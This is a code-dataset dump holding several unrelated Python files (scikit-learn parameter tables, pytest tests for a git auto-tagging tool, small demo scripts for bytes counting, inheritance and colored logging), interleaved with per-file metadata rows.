{"name": "solver", "type": "select", "values": ["lbfgs", "newton-cg", "liblinear", "sag", "saga"],
"dtype": "string", "accept_none": False},
{"name": "max_iter", "type": "input", "values": 100, "dtype": "int", "accept_none": False},
{"name": "multi_class", "type": "select", "values": ["auto", "ovr", "multinomial"], "dtype": "string",
"accept_none": False},
{"name": "verbose", "type": "input", "values": 0, "dtype": "int", "accept_none": False},
{"name": "warm_start", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False},
{"name": "n_jobs", "type": "input", "values": -1, "dtype": "int", "accept_none": True},
{"name": "l1_ratio", "type": "input", "values": 0.5, "dtype": "float", "accept_none": True}]
SVC_Params = [
{"name": "C", "type": "input", "values": 1.0, "dtype": "float", "accept_none": False},
{"name": "kernel", "type": "select", "values": ['rbf', 'poly', 'sigmoid', 'linear', 'precomputed'],
"dtype": "string", "accept_none": False},
{"name": "degree", "type": "input", "values": 3, "dtype": "int", "accept_none": False},
{"name": "gamma", "type": "select", "values": ["scale", "auto"], "dtype": "string", "accept_none": False},
{"name": "coef0", "type": "input", "values": 0.0, "dtype": "float", "accept_none": False},
{"name": "shrinking", "type": "select", "values": [True, False], "dtype": "boolean", "accept_none": False},
{"name": "probability", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False},
{"name": "tol", "type": "input", "values": 0.001, "dtype": "float", "accept_none": False},
{"name": "cache_size", "type": "input", "values": 200, "dtype": "float", "accept_none": False},
{"name": "class_weight", "type": "select", "values": ['balanced'], "dtype": "string", "accept_none": True},
{"name": "verbose", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False},
{"name": "max_iter", "type": "input", "values": -1, "dtype": "int", "accept_none": False},
{"name": "break_ties", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False},
{"name": "random_state", "type": "input", "values": 101, "dtype": "int", "accept_none": True}]
KNeighborsClassifier_Params = [
{"name": "n_neighbors", "type": "input", "values": 5, "dtype": "int", "accept_none": False},
{"name": "weights", "type": "select", "values": ['uniform', 'distance'], "dtype": "string", "accept_none": False},
{"name": "algorithm", "type": "select", "values": ["auto", "ball_tree", "kd_tree", "brute"], "dtype": "string",
"accept_none": False},
{"name": "leaf_size", "type": "input", "values": 30, "dtype": "int", "accept_none": False},
{"name": "p", "type": "input", "values": 2, "dtype": "int", "accept_none": True},
{"name": "metric", "type": "select", "values": ['minkowski', 'euclidean', 'manhattan', 'chebyshev', 'mahalanobis'],
"dtype": "string", "accept_none": False},
{"name": "n_jobs", "type": "input", "values": -1, "dtype": "int", "accept_none": True}
]
DecisionTreeClassifier_Params = [
{"name": "criterion", "type": "select", "values": ['gini', 'entropy'], "dtype": "string", "accept_none": False},
{"name": "splitter", "type": "select", "values": ['best', 'random'], "dtype": "string", "accept_none": False},
{"name": "max_depth", "type": "input", "values": 5, "dtype": "int", "accept_none": False},
{"name": "min_samples_split", "type": "input", "values": 2, "dtype": "int", "accept_none": False},
{"name": "min_samples_leaf", "type": "input", "values": 1, "dtype": "int", "accept_none": False},
{"name": "min_weight_fraction_leaf", "type": "input", "values": 0.0, "dtype": "float", "accept_none": False},
{"name": "max_features", "type": "select", "values": ["auto", "sqrt", "log2"], "dtype": "string",
"accept_none": True},
{"name": "random_state", "type": "input", "values": 101, "dtype": "int", "accept_none": True},
{"name": "max_leaf_nodes", "type": "input", "values": 5, "dtype": "int", "accept_none": True},
{"name": "min_impurity_decrease", "type": "input", "values": 0.0, "dtype": "float", "accept_none": True},
{"name": "class_weight", "type": "select", "values": ["balanced"], "dtype": "string", "accept_none": True},
{"name": "ccp_alpha", "type": "input", "values": 0.0, "dtype": "float", "accept_none": True}]
RandomForestClassifier_Params = [
{"name": "n_estimators", "type": "input", "values": 100, "dtype": "int", "accept_none": False},
{"name": "criterion", "type": "select", "values": ["gini", "entropy"], "dtype": "string", "accept_none": False},
{"name": "max_depth", "type": "input", "values": 5, "dtype": "int", "accept_none": True},
{"name": "min_samples_split", "type": "input", "values": 2, "dtype": "int", "accept_none": False},
{"name": "min_samples_leaf", "type": "input", "values": 1, "dtype": "int", "accept_none": False},
{"name": "min_weight_fraction_leaf", "type": "input", "values": 0.0, "dtype": "float", "accept_none": False},
{"name": "max_features", "type": "select", "values": ["auto", "sqrt", "log2"], "dtype": "string",
"accept_none": True},
{"name": "max_leaf_nodes", "type": "input", "values": 5, "dtype": "int", "accept_none": True},
{"name": "min_impurity_decrease", "type": "input", "values": 0.0, "dtype": "float", "accept_none": True},
{"name": "bootstrap", "type": "select", "values": [True, False], "dtype": "boolean", "accept_none": False},
{"name": "oob_score", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False},
{"name": "n_jobs", "type": "input", "values": -1, "dtype": "int", "accept_none": True},
{"name": "random_state", "type": "input", "values": 101, "dtype": "int", "accept_none": True},
{"name": "verbose", "type": "input", "values": 0, "dtype": "int", "accept_none": False},
{"name": "warm_start", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False},
{"name": "class_weight", "type": "select", "values": ["balanced", "balanced_subsample"], "dtype": "string",
"accept_none": True},
{"name": "ccp_alpha", "type": "input", "values": 0.0, "dtype": "float", "accept_none": True},
{"name": "max_samples", "type": "input", "values": "", "dtype": "int", "accept_none": True}]
GradientBoostingClassifier_Params = [
{"name": "loss", "type": "select", "values": ["deviance", "exponential"], "dtype": "string", "accept_none": False},
{"name": "learning_rate", "type": "input", "values": 0.1, "dtype": "float", "accept_none": False},
{"name": "n_estimators", "type": "input", "values": 100, "dtype": "int", "accept_none": False},
{"name": "subsample", "type": "input", "values": 1.0, "dtype": "float", "accept_none": False},
{"name": "criterion", "type": "select", "values": ["friedman_mse", "squared_error", "mae"], "dtype": "string",
"accept_none": False},
{"name": "min_samples_split", "type": "input", "values": 2, "dtype": "int", "accept_none": False},
{"name": "min_samples_leaf", "type": "input", "values": 1, "dtype": "int", "accept_none": False},
{"name": "min_weight_fraction_leaf", "type": "input", "values": 0.0, "dtype": "float", "accept_none": False},
{"name": "max_depth", "type": "input", "values": 3, "dtype": "int", "accept_none": False},
{"name": "min_impurity_decrease", "type": "input", "values": 0.0, "dtype": "float", "accept_none": False},
{"name": "random_state", "type": "input", "values": 100, "dtype": "int", "accept_none": True},
{"name": "max_features", "type": "select", "values": ["auto", "sqrt", "log2"], "dtype": "string",
"accept_none": True},
{"name": "verbose", "type": "input", "values": 0, "dtype": "int", "accept_none": False},
{"name": "max_leaf_nodes", "type": "input", "values": 5, "dtype": "int", "accept_none": True},
{"name": "warm_start", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False},
{"name": "validation_fraction", "type": "input", "values": 0.1, "dtype": "float", "accept_none": False},
{"name": "n_iter_no_change", "type": "input", "values": 5, "dtype": "int", "accept_none": True},
{"name": "tol", "type": "input", "values": 0.0001, "dtype": "float", "accept_none": False},
{"name": "ccp_alpha", "type": "input", "values": 0.0, "dtype": "float", "accept_none": False}]
AdaBoostClassifier_Params = [
{"name": "base_estimator", "type": "input", "values": None, "dtype": "object", "accept_none": True},
{"name": "n_estimators", "type": "input", "values": 50, "dtype": "int", "accept_none": False},
{"name": "learning_rate", "type": "input", "values": 1.0, "dtype": "float", "accept_none": False},
{"name": "algorithm", "type": "select", "values": ["SAMME.R", "SAMME"], "dtype": "string", "accept_none": False},
{"name": "random_state", "type": "input", "values": 1, "dtype": "int", "accept_none": True}]
# -----------------------------------------------------------------------------------------------------------
KmeansClustering_Params = [
{"name": "n_clusters", "type": "input", "values": 8, "dtype": "int", "accept_none": False},
{"name": "init", "type": "select", "values": ["k-means++", "random"], "dtype": "string", "accept_none": False},
{"name": "n_init", "type": "input", "values": 10, "dtype": "int", "accept_none": False},
{"name": "max_iter", "type": "input", "values": 300, "dtype": "int", "accept_none": False},
{"name": "tol", "type": "float", "values": 0.0001, "dtype": "float", "accept_none": False},
{"name": "verbose", "type": "input", "values": 0, "dtype": "int", "accept_none": False},
{"name": "random_state", "type": "input", "values": 1, "dtype": "int", "accept_none": True},
{"name": "copy_x", "type": "select", "values": [True, False], "dtype": "boolean", "accept_none": False},
{"name": "algorithm", "type": "select", "values": ["auto", "full", "elkan"], "dtype": "string",
"accept_none": False}]
DbscanClustering_Params = [
{"name": "eps", "type": "float", "values": 0.5, "dtype": "float", "accept_none": False},
{"name": "min_samples", "type": "input", "values": 5, "dtype": "int", "accept_none": False},
{"name": "metric", "type": "select", "values": ['euclidean', 'cityblock', 'cosine', 'l1', 'l2', 'manhattan'],
"dtype": "string", "accept_none": False},
{"name": "algorithm", "type": "select", "values": ["auto", "ball_tree", "kd_tree", "brute"], "dtype": "string",
"accept_none": False},
{"name": "leaf_size", "type": "input", "values": 30, "dtype": "int", "accept_none": False},
{"name": "n_jobs", "type": "input", "values": -1, "dtype": "int", "accept_none": True}]
AgglomerativeClustering_Params = [
{"name": "n_clusters", "type": "input", "values": 2, "dtype": "int", "accept_none": True},
{"name": "affinity", "type": "select", "values": ["euclidean"], "dtype": "string", "accept_none": False},
{"name": "compute_full_tree", "type": "select", "values": ["auto"], "dtype": "string", "accept_none": False},
{"name": "linkage", "type": "select", "values": ["ward", "complete", "average", "single"], "dtype": "string",
"accept_none": False},
{"name": "compute_distances", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False}]
Params_Mappings = {
"true": True,
"false": False
}
| 81.439286
| 120
| 0.568873
| 2,618
| 22,803
| 4.798701
| 0.074866
| 0.16079
| 0.180291
| 0.21627
| 0.915944
| 0.901297
| 0.878373
| 0.850752
| 0.83738
| 0.820664
| 0
| 0.012667
| 0.144893
| 22,803
| 279
| 121
| 81.731183
| 0.631622
| 0.0107
| 0
| 0.589844
| 0
| 0
| 0.488761
| 0.011971
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6cbbbd484bfb38bdfc38fb311ee2be38282e8c90
| 11,757
|
py
|
Python
|
auto_tag/tests/test_core.py
|
fossabot/auto-tag
|
ec43bfbe2ae610219c9cfe7aab5be9c4328f83ab
|
[
"MIT"
] | null | null | null |
auto_tag/tests/test_core.py
|
fossabot/auto-tag
|
ec43bfbe2ae610219c9cfe7aab5be9c4328f83ab
|
[
"MIT"
] | null | null | null |
auto_tag/tests/test_core.py
|
fossabot/auto-tag
|
ec43bfbe2ae610219c9cfe7aab5be9c4328f83ab
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
"""
Test simple flows of the AutoTag application
"""
import os
import git
import pytest
from auto_tag import core
# pylint:disable=invalid-name
TEST_DATA_SIMPLE_TAG_PATCH_BUMP = [
('0.0.1', '0.0.2'),
('0.1.1', '0.1.2'),
('1.0.1', '1.0.2'),
]
TEST_DATA_SIMPLE_TAG_PATCH_MINOR = [
('0.0.1', '0.1.0'),
('0.1.1', '0.2.0'),
('1.0.1', '1.1.0'),
]
TEST_DATA_SIMPLE_TAG_PATCH_MAJOR = [
('0.0.1', '1.0.0'),
('0.1.1', '1.0.0'),
('1.0.1', '2.0.0'),
]
TEST_NAME = 'test_user'
TEST_EMAIL = 'test@email.com'
TEST_NAME_2 = 'test_user_2'
TEST_EMAIL_2 = 'test_2@email.com'
def test_simple_flow_no_existing_tag(simple_repo, default_detectors):
"""Test a simple flow locally."""
repo = git.Repo(simple_repo, odbt=git.GitDB)
autotag = core.AutoTag(
repo=simple_repo,
branch='master',
upstream_remotes=None,
detectors=default_detectors,
git_name=TEST_NAME,
git_email=TEST_EMAIL)
autotag.work()
assert '0.0.1' in repo.tags
@pytest.mark.parametrize('existing_tag, next_tag',
TEST_DATA_SIMPLE_TAG_PATCH_BUMP)
def test_simple_flow_existing_tag(
existing_tag, next_tag, simple_repo, default_detectors):
"""Test a simple flow locally."""
repo = git.Repo(simple_repo, odbt=git.GitDB)
repo.create_tag(
existing_tag,
ref=list(repo.iter_commits())[-1])
autotag = core.AutoTag(
repo=simple_repo,
branch='master',
upstream_remotes=None,
detectors=default_detectors,
git_name=TEST_NAME,
git_email=TEST_EMAIL)
autotag.work()
assert next_tag in repo.tags
@pytest.mark.parametrize('existing_tag, next_tag',
TEST_DATA_SIMPLE_TAG_PATCH_BUMP)
def test_simple_flow_existing_tag_on_last_commit(
existing_tag, next_tag, simple_repo, default_detectors):
"""Test a simple flow locally."""
repo = git.Repo(simple_repo, odbt=git.GitDB)
repo.create_tag(
existing_tag,
ref=list(repo.iter_commits())[0])
autotag = core.AutoTag(
repo=simple_repo,
branch='master',
upstream_remotes=None,
detectors=default_detectors,
git_name=TEST_NAME,
git_email=TEST_EMAIL,
skip_if_exists=True)
autotag.work()
assert next_tag not in repo.tags
@pytest.mark.parametrize('existing_tag, next_tag',
TEST_DATA_SIMPLE_TAG_PATCH_BUMP)
def test_simple_flow_existing_tag_append_v(
existing_tag, next_tag, simple_repo, default_detectors):
"""Test a simple flow locally."""
repo = git.Repo(simple_repo, odbt=git.GitDB)
repo.create_tag(
existing_tag,
ref=list(repo.iter_commits())[-1])
autotag = core.AutoTag(
repo=simple_repo,
branch='master',
upstream_remotes=None,
detectors=default_detectors,
git_name=TEST_NAME,
git_email=TEST_EMAIL,
append_v=True)
autotag.work()
assert 'v{}'.format(next_tag) in repo.tags
@pytest.mark.parametrize('existing_tag, next_tag',
TEST_DATA_SIMPLE_TAG_PATCH_MINOR)
def test_simple_flow_existing_tag_minor_bump(
existing_tag, next_tag, simple_repo_minor_commit, default_detectors):
"""Test a simple flow locally."""
repo = git.Repo(simple_repo_minor_commit, odbt=git.GitDB)
repo.create_tag(
existing_tag,
ref=list(repo.iter_commits())[-1])
autotag = core.AutoTag(
repo=simple_repo_minor_commit,
branch='master',
upstream_remotes=None,
detectors=default_detectors,
git_name=TEST_NAME,
git_email=TEST_EMAIL)
autotag.work()
assert next_tag in repo.tags
@pytest.mark.parametrize('existing_tag, next_tag',
TEST_DATA_SIMPLE_TAG_PATCH_MAJOR)
def test_simple_flow_existing_tag_major_bump(
existing_tag, next_tag, simple_repo_major_commit, default_detectors):
"""Test a simple flow locally."""
repo = git.Repo(simple_repo_major_commit, odbt=git.GitDB)
repo.create_tag(
existing_tag,
ref=list(repo.iter_commits())[-1])
autotag = core.AutoTag(
repo=simple_repo_major_commit,
branch='master',
upstream_remotes=None,
detectors=default_detectors,
git_name=TEST_NAME,
git_email=TEST_EMAIL)
autotag.work()
assert next_tag in repo.tags
def test_push_to_remote(simple_repo, tmpdir, default_detectors):
"""Test the ability to push to remotes."""
repo = git.Repo(simple_repo, odbt=git.GitDB)
cloned_repo_path = os.path.join(tmpdir, 'cloned-repo')
cloned_repo = repo.clone(cloned_repo_path)
autotag = core.AutoTag(
repo=cloned_repo_path,
branch='master',
upstream_remotes=['origin'],
detectors=default_detectors,
git_name=TEST_NAME,
git_email=TEST_EMAIL)
autotag.work()
assert '0.0.1' in repo.tags
assert '0.0.1' in cloned_repo.tags
def test_push_to_multiple_remotes(simple_repo, tmpdir, default_detectors):
"""Test the ability to push to remotes."""
repo = git.Repo(simple_repo, odbt=git.GitDB)
cloned_repo_path = os.path.join(tmpdir, 'cloned-repo')
second_remote_path = os.path.join(tmpdir, 'second_remote')
cloned_repo = repo.clone(cloned_repo_path)
second_remote = git.Repo.init(second_remote_path, odbt=git.GitDB)
cloned_repo.create_remote('second_remote', second_remote.common_dir)
autotag = core.AutoTag(
repo=cloned_repo_path,
branch='master',
upstream_remotes=['origin', 'second_remote'],
detectors=default_detectors,
git_name=TEST_NAME,
git_email=TEST_EMAIL)
autotag.work()
assert '0.0.1' in cloned_repo.tags
assert '0.0.1' in repo.tags
assert '0.0.1' in second_remote.tags
def test_multiple_commits(simple_repo, default_detectors):
"""Test to see if multiple commits with minor and major impact are handled
properly."""
repo = git.Repo(simple_repo, odbt=git.GitDB)
for message in [
'feature(m1): this is a feature it trigger a minor update',
'fix(m1): a fix is triggering a patch',
'fix(m1): fix with a breaking change \n BREAKING_CHANGE']:
file_path = os.path.join(
repo.working_dir, 'f_{}'.format(message[:4]))
open(file_path, 'w+').close()
repo.index.commit(message)
repo.create_tag(
'1.2.3',
ref=list(repo.iter_commits())[-1])
autotag = core.AutoTag(
repo=simple_repo,
branch='master',
upstream_remotes=None,
detectors=default_detectors,
git_name=TEST_NAME,
git_email=TEST_EMAIL)
autotag.work()
assert '2.0.0' in repo.tags
def test_tag_message_has_heading(simple_repo, default_detectors):
"""Test to see if the tag message has all the commit headings."""
repo = git.Repo(simple_repo, odbt=git.GitDB)
repo.create_tag(
'1.2.3',
ref=list(repo.iter_commits())[0])
messages = [
'feature(m1): this is a feature it trigger a minor update \n text',
'fix(m1): a fix is triggering a patch \n more text',
'fix(m1): with a breaking change \n BREAKING_CHANGE \n even more'
]
for message in messages:
file_path = os.path.join(
repo.working_dir, 'f_{}'.format(message[:4]))
open(file_path, 'w+').close()
repo.index.commit(message)
autotag = core.AutoTag(
repo=simple_repo,
branch='master',
upstream_remotes=None,
detectors=default_detectors,
git_name=TEST_NAME,
git_email=TEST_EMAIL)
autotag.work()
assert '2.0.0' in repo.tags
for message in messages:
assert message.split('\n')[0].strip() in repo.tags['2.0.0'].tag.message
def test_tag_message_user_exists_and_not_specified(
simple_repo, default_detectors):
"""Test to see if the tag message has all the commit headings."""
repo = git.Repo(simple_repo, odbt=git.GitDB)
with repo.config_writer() as config_writer:
config_writer.set_value('user', 'name', TEST_NAME)
config_writer.set_value('user', 'email', TEST_EMAIL)
autotag = core.AutoTag(
repo=simple_repo,
branch='master',
upstream_remotes=None,
detectors=default_detectors,
git_name=TEST_NAME,
git_email=TEST_EMAIL)
autotag.work()
assert '0.0.1' in repo.tags
assert TEST_NAME == repo.tags['0.0.1'].tag.tagger.name
assert TEST_EMAIL == repo.tags['0.0.1'].tag.tagger.email
def test_tag_message_user_exists_and_specified(simple_repo, default_detectors):
"""Test to see if the tag message has all the commit headings."""
repo = git.Repo(simple_repo, odbt=git.GitDB)
with repo.config_writer() as config_writer:
config_writer.set_value('user', 'name', TEST_NAME)
config_writer.set_value('user', 'email', TEST_EMAIL)
autotag = core.AutoTag(
repo=simple_repo,
branch='master',
detectors=default_detectors,
git_name=TEST_NAME_2,
git_email=TEST_EMAIL_2,
upstream_remotes=None)
autotag.work()
assert '0.0.1' in repo.tags
assert TEST_NAME_2 == repo.tags['0.0.1'].tag.tagger.name
assert TEST_EMAIL_2 == repo.tags['0.0.1'].tag.tagger.email
def test_tag_message_user_exists_and_only_email_specified(
simple_repo, default_detectors):
"""Test to see if the tag message has all the commit headings."""
repo = git.Repo(simple_repo, odbt=git.GitDB)
with repo.config_writer() as config_writer:
config_writer.set_value('user', 'name', TEST_NAME)
config_writer.set_value('user', 'email', TEST_EMAIL)
autotag = core.AutoTag(
repo=simple_repo,
branch='master',
detectors=default_detectors,
git_email=TEST_EMAIL_2,
upstream_remotes=None)
autotag.work()
assert '0.0.1' in repo.tags
assert TEST_NAME == repo.tags['0.0.1'].tag.tagger.name
assert TEST_EMAIL_2 == repo.tags['0.0.1'].tag.tagger.email
def test_tag_message_user_does_not_exists_and_specified(
simple_repo, default_detectors):
"""Test to see if the tag message has all the commit headings."""
repo = git.Repo(simple_repo, odbt=git.GitDB)
autotag = core.AutoTag(
repo=simple_repo,
branch='master',
detectors=default_detectors,
git_name=TEST_NAME_2,
git_email=TEST_EMAIL_2,
upstream_remotes=None)
autotag.work()
assert '0.0.1' in repo.tags
assert TEST_NAME_2 == repo.tags['0.0.1'].tag.tagger.name
assert TEST_EMAIL_2 == repo.tags['0.0.1'].tag.tagger.email
def test_tag_message_user_exists_and_specify_make_sure_clean_env(
simple_repo, default_detectors):
"""Test to see if the tag message has all the commit headings."""
repo = git.Repo(simple_repo, odbt=git.GitDB)
with repo.config_writer() as config_writer:
config_writer.set_value('user', 'name', TEST_NAME)
config_writer.set_value('user', 'email', TEST_EMAIL)
autotag = core.AutoTag(
repo=simple_repo,
branch='master',
detectors=default_detectors,
git_email=TEST_EMAIL_2,
upstream_remotes=None)
autotag.work()
assert '0.0.1' in repo.tags
assert TEST_NAME == repo.tags['0.0.1'].tag.tagger.name
assert TEST_EMAIL_2 == repo.tags['0.0.1'].tag.tagger.email
with repo.config_writer() as config_writer:
repo_config_name = config_writer.get_value('user', 'name')
repo_config_email = config_writer.get_value('user', 'email')
assert TEST_NAME == repo_config_name
assert TEST_EMAIL == repo_config_email
| 31.103175
| 79
| 0.660543
| 1,660
| 11,757
| 4.407831
| 0.085542
| 0.058767
| 0.053574
| 0.03485
| 0.882602
| 0.855405
| 0.831625
| 0.795818
| 0.775044
| 0.775044
| 0
| 0.01806
| 0.222931
| 11,757
| 377
| 80
| 31.185676
| 0.782837
| 0.066173
| 0
| 0.750877
| 0
| 0
| 0.088813
| 0
| 0
| 0
| 0
| 0
| 0.108772
| 1
| 0.052632
| false
| 0
| 0.014035
| 0
| 0.066667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6ccf4063502527d1691f192bb29767b214b3cf6f
| 845
|
py
|
Python
|
03/03/count.py
|
pylangstudy/201708
|
126b1af96a1d1f57522d5a1d435b58597bea2e57
|
[
"CC0-1.0"
] | null | null | null |
03/03/count.py
|
pylangstudy/201708
|
126b1af96a1d1f57522d5a1d435b58597bea2e57
|
[
"CC0-1.0"
] | 39
|
2017-07-31T22:54:01.000Z
|
2017-08-31T00:19:03.000Z
|
03/03/count.py
|
pylangstudy/201708
|
126b1af96a1d1f57522d5a1d435b58597bea2e57
|
[
"CC0-1.0"
] | null | null | null |
print(str(b'ABC'.count(b'A')))
print(str(b'ABC'.count(b'AB')))
print(str(b'ABC'.count(b'AC')))
print(str(b'AbcA'.count(b'A')))
print(str(b'AbcAbcAbc'.count(b'A', 3)))
print(str(b'AbcAbcAbc'.count(b'A', 3, 5)))
print()
print(str(bytearray(b'ABC').count(b'A')))
print(str(bytearray(b'ABC').count(b'AB')))
print(str(bytearray(b'ABC').count(b'AC')))
print(str(bytearray(b'AbcA').count(b'A')))
print(str(bytearray(b'AbcAbcAbc').count(b'A', 3)))
print(str(bytearray(b'AbcAbcAbc').count(b'A', 3, 5)))
print()
print(str(bytearray(b'ABC').count(bytearray(b'A'))))
print(str(bytearray(b'ABC').count(bytearray(b'AB'))))
print(str(bytearray(b'ABC').count(bytearray(b'AC'))))
print(str(bytearray(b'AbcA').count(bytearray(b'A'))))
print(str(bytearray(b'AbcAbcAbc').count(bytearray(b'A'), 3)))
print(str(bytearray(b'AbcAbcAbc').count(bytearray(b'A'), 3, 5)))
| 38.409091
| 64
| 0.672189
| 155
| 845
| 3.664516
| 0.083871
| 0.253521
| 0.359155
| 0.380282
| 0.998239
| 0.998239
| 0.984155
| 0.859155
| 0.422535
| 0.330986
| 0
| 0.011043
| 0.035503
| 845
| 21
| 65
| 40.238095
| 0.68589
| 0
| 0
| 0.1
| 0
| 0
| 0.138626
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
6cfd71c4a9cc398c5441653d08eeac5e0a6af891
| 374
|
py
|
Python
|
OOPS/Diamond shape prob.py
|
Jigyanshu17/Python-Ka-Saara-Gyaan
|
d3f5dbb3fef45a7a6953bf6041b0b3bf6c54ad2b
|
[
"Apache-2.0"
] | null | null | null |
OOPS/Diamond shape prob.py
|
Jigyanshu17/Python-Ka-Saara-Gyaan
|
d3f5dbb3fef45a7a6953bf6041b0b3bf6c54ad2b
|
[
"Apache-2.0"
] | null | null | null |
OOPS/Diamond shape prob.py
|
Jigyanshu17/Python-Ka-Saara-Gyaan
|
d3f5dbb3fef45a7a6953bf6041b0b3bf6c54ad2b
|
[
"Apache-2.0"
] | null | null | null |
class A:
def met(self):
print("this is a method from class A")
class B(A):
def met(self):
print("this is a method from class B")
class C(A):
def met(self):
print("this is a method from class C")
class D(C,B):
def met(self):
print("this is a method from class D")
a = A()
b = B()
c = C()
d = D()
d.met()
| 17.809524
| 47
| 0.513369
| 66
| 374
| 2.909091
| 0.19697
| 0.125
| 0.208333
| 0.3125
| 0.786458
| 0.786458
| 0.786458
| 0.786458
| 0.786458
| 0.786458
| 0
| 0
| 0.342246
| 374
| 21
| 48
| 17.809524
| 0.780488
| 0
| 0
| 0.235294
| 0
| 0
| 0.326761
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.235294
| false
| 0
| 0
| 0
| 0.470588
| 0.235294
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9fa627d61c3e34727b7623e35363c5ee68de0d49
| 515
|
py
|
Python
|
lemon/libs/logging.py
|
InsaneMiner/Salt
|
b61c5f931fe4b6fa652e8fbfb59b30dbaaf9ed18
|
[
"MIT"
] | 6
|
2020-11-22T11:42:55.000Z
|
2022-01-09T12:29:30.000Z
|
lemon/libs/logging.py
|
InsaneMiner/Salt
|
b61c5f931fe4b6fa652e8fbfb59b30dbaaf9ed18
|
[
"MIT"
] | 1
|
2020-11-21T00:05:40.000Z
|
2020-11-22T21:58:54.000Z
|
lemon/libs/logging.py
|
InsaneMiner/Salt
|
b61c5f931fe4b6fa652e8fbfb59b30dbaaf9ed18
|
[
"MIT"
] | 2
|
2021-06-05T04:19:04.000Z
|
2021-06-05T04:28:08.000Z
|
import lemon.libs.colors
def error(message,end=''):
print(f"{lemon.libs.colors.colors.bold}{lemon.libs.colors.colors.fg.red}{message}{lemon.libs.colors.colors.reset}",end=end)
def good(message,end=''):
print(f"{lemon.libs.colors.colors.fg.green}{message}{lemon.libs.colors.colors.reset}",end=end)
def notice(message,end=''):
print(f"{lemon.libs.colors.colors.bold}{lemon.libs.colors.colors.fg.yellow}{message}{lemon.libs.colors.colors.reset}",end=end)
def log(message,end=''):
print(message,end=end)
| 57.222222
| 130
| 0.732039
| 82
| 515
| 4.597561
| 0.231707
| 0.214854
| 0.35809
| 0.445623
| 0.777188
| 0.771883
| 0.771883
| 0.771883
| 0.67374
| 0.339523
| 0
| 0
| 0.056311
| 515
| 9
| 131
| 57.222222
| 0.77572
| 0
| 0
| 0
| 0
| 0.333333
| 0.560078
| 0.560078
| 0
| 0
| 0
| 0
| 0
| 1
| 0.444444
| false
| 0
| 0.111111
| 0
| 0.555556
| 0.444444
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
|
0
| 12
|
9fc2479878f5aac52a6dcb54bed50daa31607e79
| 175
|
py
|
Python
|
app/models/__init__.py
|
widal001/flask-api-template
|
cbda9c6a00fdc355b235d869d65db77257595107
|
[
"MIT"
] | null | null | null |
app/models/__init__.py
|
widal001/flask-api-template
|
cbda9c6a00fdc355b235d869d65db77257595107
|
[
"MIT"
] | 5
|
2021-05-05T21:05:46.000Z
|
2021-05-12T19:19:34.000Z
|
app/models/__init__.py
|
widal001/flask-api-template
|
cbda9c6a00fdc355b235d869d65db77257595107
|
[
"MIT"
] | 1
|
2021-05-07T12:54:19.000Z
|
2021-05-07T12:54:19.000Z
|
from app.models.base_model import db
from app.models.book_model import Book
from app.models.library_model import Library
from app.models.library_book_model import LibraryBook
| 35
| 53
| 0.862857
| 29
| 175
| 5.034483
| 0.344828
| 0.191781
| 0.356164
| 0.273973
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091429
| 175
| 4
| 54
| 43.75
| 0.918239
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4c95a4acac3f3dc08849d7ad787204ee70b40336
| 120
|
py
|
Python
|
instapy/xpath.py
|
kofway/InstaPy
|
fecc59de48395da55d74fafa93344710ef7d29fd
|
[
"MIT"
] | null | null | null |
instapy/xpath.py
|
kofway/InstaPy
|
fecc59de48395da55d74fafa93344710ef7d29fd
|
[
"MIT"
] | null | null | null |
instapy/xpath.py
|
kofway/InstaPy
|
fecc59de48395da55d74fafa93344710ef7d29fd
|
[
"MIT"
] | null | null | null |
from .xpath_compile import xpath
def read_xpath(function_name, xpath_name):
return xpath[function_name][xpath_name]
| 30
| 43
| 0.816667
| 18
| 120
| 5.111111
